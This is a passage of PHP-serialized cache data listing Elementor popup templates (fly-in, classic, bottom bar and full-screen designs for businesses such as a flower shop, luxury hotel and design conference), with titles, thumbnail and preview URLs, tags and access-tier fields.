Nutritionist\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/nutritionist-69-small.jpg\";s:12:\"tmpl_created\";i:1647762620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-subscription-nutritionist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Food\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:45;a:21:{s:4:\"tmpl\";i:1328;s:2:\"id\";i:22833;s:5:\"title\";s:40:\"Classic | Subscription | App & SaaS\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/app-70-small.jpg\";s:12:\"tmpl_created\";i:1647762955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscription-app-saas/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:14:\"[\"App\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:46;a:21:{s:4:\"tmpl\";i:1329;s:2:\"id\";i:22844;s:5:\"title\";s:41:\"Bottom Bar | Discount | Handmade Cupcakes\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/72-Handmade-Cupcakes-Discount.jpg\";s:12:\"tmpl_created\";i:1647763350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-cupcakes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:21:\"[\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:47;a:21:{s:4:\"tmpl\";i:1330;s:2:\"id\";i:22855;s:5:\"title\";s:40:\"Bottom Bar | Subscription | Fashion Blog\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-blog-75-small.jpg\";s:12:\"tmpl_created\";i:1647763907;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/bottom-bar-subscription-fashion-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:30:\"[\"Blog\",\"Fashion\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:48;a:21:{s:4:\"tmpl\";i:1331;s:2:\"id\";i:22866;s:5:\"title\";s:28:\"Fly-In | CTA | Private Tutor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-77-small.jpg\";s:12:\"tmpl_created\";i:1647764062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-cta-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:49;a:21:{s:4:\"tmpl\";i:1332;s:2:\"id\";i:22876;s:5:\"title\";s:30:\"Classic | CTA | Tennis Academy\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/78-Tennis-Academy-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765192;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-tennis-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:50;a:21:{s:4:\"tmpl\";i:1333;s:2:\"id\";i:22887;s:5:\"title\";s:31:\"Fly-In | CTA | Shared Workspace\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/shared-workspace-79-small.jpg\";s:12:\"tmpl_created\";i:1647765419;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-shared-workspace/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Business\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:51;a:21:{s:4:\"tmpl\";i:1334;s:2:\"id\";i:22899;s:5:\"title\";s:30:\"Bottom Bar | CTA | Art Gallery\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/80-Art-Gallery-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765652;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/bottom-bar-cta-art-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:13:\"[\"Art\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:52;a:21:{s:4:\"tmpl\";i:1335;s:2:\"id\";i:22910;s:5:\"title\";s:44:\"Fly-In | Subscription | Hiking Tours Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/hiking-tours-company-81-small.jpg\";s:12:\"tmpl_created\";i:1647765835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscription-hiking-tours-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Subscribe\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:53;a:21:{s:4:\"tmpl\";i:1336;s:2:\"id\";i:22921;s:5:\"title\";s:26:\"Classic | CTA | Music Band\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/music-band-82-small.jpg\";s:12:\"tmpl_created\";i:1647769462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/classic-cta-music-band/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Marketing\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:54;a:21:{s:4:\"tmpl\";i:1337;s:2:\"id\";i:22935;s:5:\"title\";s:35:\"Classic | CTA | Computer Technician\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/comuter-technician-83-small.jpg\";s:12:\"tmpl_created\";i:1647769843;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-computer-technician/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:55;a:21:{s:4:\"tmpl\";i:1338;s:2:\"id\";i:22945;s:5:\"title\";s:37:\"Classic | Discount | Delivery Company\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/delivery-company-88-small.jpg\";s:12:\"tmpl_created\";i:1647770834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-delivery-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Discount\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:56;a:21:{s:4:\"tmpl\";i:1339;s:2:\"id\";i:22959;s:5:\"title\";s:29:\"Classic | Discount | Eco Shop\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/echo-shop-89-small.jpg\";s:12:\"tmpl_created\";i:1647771211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-discount-eco-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:57;a:21:{s:4:\"tmpl\";i:1340;s:2:\"id\";i:22972;s:5:\"title\";s:54:\"Fly-In | Subscription | Health & Mindfulness Blog\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small.jpg\";s:12:\"tmpl_created\";i:1647771461;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/fly-in-subscription-health-mindfulness-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:21:\"[\"Health\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:58;a:21:{s:4:\"tmpl\";i:1341;s:2:\"id\";i:22982;s:5:\"title\";s:31:\"Full Screen | Menu | Art Museum\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/art-museum-112-small.jpg\";s:12:\"tmpl_created\";i:1647771938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-art-museum/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:59;a:21:{s:4:\"tmpl\";i:1342;s:2:\"id\";i:22992;s:5:\"title\";s:40:\"Classic | Discount | Urban Clothing Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small-1.jpg\";s:12:\"tmpl_created\";i:1647773067;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-urban-clothing-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Discount\",\"Ecommerce\",\"Fashion\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:60;a:21:{s:4:\"tmpl\";i:1343;s:2:\"id\";i:23004;s:5:\"title\";s:60:\"Full Screen | Menu | Digital & Technology Design School\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small-1.jpg\";s:12:\"tmpl_created\";i:1647773366;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:155:\"https://library.elementor.com/popups/full-screen-menu-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:61;a:21:{s:4:\"tmpl\";i:1344;s:2:\"id\";i:23015;s:5:\"title\";s:62:\"Bottom Bar | Contact | Digital & Technology Design School\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2022/03/digital-design-tech-school-small.jpg\";s:12:\"tmpl_created\";i:1647773492;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:157:\"https://library.elementor.com/popups/bottom-bar-contact-digital-technology-design-school/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:23:\"[\"Contact\",\"Portfolio\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:62;a:21:{s:4:\"tmpl\";i:1345;s:2:\"id\";i:23025;s:5:\"title\";s:32:\"Full Screen | Menu | Flower Shop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small.jpg\";s:12:\"tmpl_created\";i:1647773820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/full-screen-menu-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:63;a:21:{s:4:\"tmpl\";i:1346;s:2:\"id\";i:23037;s:5:\"title\";s:36:\"Classic | Subscription | Flower Shop\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/flower-shop-small-1.jpg\";s:12:\"tmpl_created\";i:1647773949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-flower-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:64;a:21:{s:4:\"tmpl\";i:1347;s:2:\"id\";i:23056;s:5:\"title\";s:48:\"Classic | Discount | Health & Fitness eBook\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fitness-ebook-small-1.jpg\";s:12:\"tmpl_created\";i:1647774468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-discount-health-fitness-ebook/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Contact\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:65;a:21:{s:4:\"tmpl\";i:1348;s:2:\"id\";i:23067;s:5:\"title\";s:37:\"Fly-In | Menu | Baby Sleep Consultant\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small-1.jpg\";s:12:\"tmpl_created\";i:1647778954;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:8:\"[\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:66;a:21:{s:4:\"tmpl\";i:1349;s:2:\"id\";i:23077;s:5:\"title\";s:46:\"Classic | Subscription | Baby Sleep Consultant\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/baby-sleep-consultant-small.jpg\";s:12:\"tmpl_created\";i:1647779074;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/classic-subscription-baby-sleep-consultant/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:12:\"[\"Discount\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:67;a:21:{s:4:\"tmpl\";i:1350;s:2:\"id\";i:23090;s:5:\"title\";s:33:\"Full Screen | Menu | Luxury Hotel\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small.jpg\";s:12:\"tmpl_created\";i:1647779390;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/full-screen-menu-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:68;a:21:{s:4:\"tmpl\";i:1351;s:2:\"id\";i:23100;s:5:\"title\";s:31:\"Fly-In | Booking | Luxury Hotel\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/luxury-hotel-small-1.jpg\";s:12:\"tmpl_created\";i:1647779500;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-booking-luxury-hotel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:20:\"[\"Booking\",\"Travel\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:69;a:21:{s:4:\"tmpl\";i:1352;s:2:\"id\";i:23109;s:5:\"title\";s:38:\"Full Screen | Menu | Design Conference\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small.jpg\";s:12:\"tmpl_created\";i:1647779675;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/full-screen-menu-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:70;a:21:{s:4:\"tmpl\";i:1353;s:2:\"id\";i:23120;s:5:\"title\";s:41:\"Full Screen | Booking | Design Conference\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/design-conference-35-small-1.jpg\";s:12:\"tmpl_created\";i:1647779793;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/full-screen-booking-design-conference/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full 